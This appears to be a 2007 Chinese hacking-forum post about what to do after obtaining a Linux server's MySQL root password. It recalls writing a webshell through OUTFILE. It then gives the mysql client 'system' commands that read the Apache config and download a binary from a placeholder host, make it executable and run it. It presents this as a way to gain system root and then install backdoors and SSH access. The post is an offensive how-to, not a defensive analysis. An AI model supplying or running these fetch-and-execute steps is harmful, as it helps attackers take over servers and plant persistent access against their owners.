linux 之 mysql 5.x 拿到 root passwd 的後續動作

Fri, 07 Dec 2007 17:00:18 +0000

以往拿到 mysql 的 root passwd, 都是先建立一個 table, 然後 outfile.
搞到一個 webshell, 再提升權限.
這些需要 web 的絕對路徑, 也有機會遇到 sql injecion 的部份.

mysql 5.x 有引入一個 system 函數, 可執行系統指令.

mysql>system vi /etc/httpd/conf/httpd.conf;
可拿到 web 的絕對路徑, 不過不是拿來搞 webshell 的, 可以搞更邪惡的東西.

mysql>system wget http://xxxx.xxx.com/xxxx ;
mysql>system chmod +x xxxx;
mysql>system ./xxxx;

這樣就把 mysql 的 root 換成 system root 了, 接下來要跑 exp, 裝 backboor, 開 ssh 進來 <用 mysql 的 root passwd> 都隨你搞了.

0v3rl04d - new forum threads